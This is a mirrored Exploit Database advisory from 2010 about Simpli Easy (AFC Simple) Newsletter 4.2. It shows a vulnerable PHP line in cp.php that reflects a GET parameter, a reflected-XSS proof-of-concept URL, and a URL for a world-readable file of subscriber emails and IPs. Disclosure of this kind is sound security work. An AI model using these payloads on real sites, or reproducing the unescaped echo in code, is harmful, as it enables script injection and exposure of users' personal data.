Simpli Easy (AFC Simple) NewsLetter 4.2 – Cross-Site Scripting / Information Leakage

Exploit Database
105 阅读

作者： p0deje

日期： 2010-10-30
类别：
- webapps
平台：
- php
来源：https://www.exploit-db.com/exploits/15355/

Simpli Easy (AFC Simple) Newsletter <= 4.2 XSS/Information Leakage

Date: 30.10.2010
Author: p0deje | http://p0deje.blogspot.com
Software Link: http://scubadivingcalculators.com/simpli-easy-newsletter.php
Version: <= 4.2
 
1. Cross-site Scripting
 
Vulnerable code:
cp.php
----------------
6:<form name="txtlist" action="cp.php?do=<?=$_GET['do']?>"
method="post">

Proof-of-concept: 
http://www.example.com/cp.php?do="><script>alert(1)</script>

2. Information Leakage

By default, application saves subscribed email addresses and
correspondent IP addresses to plain text file el.txt

Proof-of-concept:
http://www.example.com/el.txt

last Exploits
Simpli Easy (AFC Simple) NewsLetter 4.2 – Cross-Site Scripting / Information Leakage的更多信息

Snipe Gallery 3.1 – ‘image.php?cfg_admin_path’ Remote File Inclusion：
HP Insight Diagnostics – Remote Code Injection：
Spotweb 1.4.9 – ‘search’ SQL Injection：
School Faculty Scheduling System 1.0 – Stored Cross Site Scripting POC：
D-Link DCS-931L – Arbitrary File Upload (Metasploit)：
elearning-script 1.0 – Authentication Bypass：
WordPress Plugin AdRotate 3.6.6 – SQL Injection：
XOOPS 2.5 – ‘banners.php’ Multiple Local File Inclusions：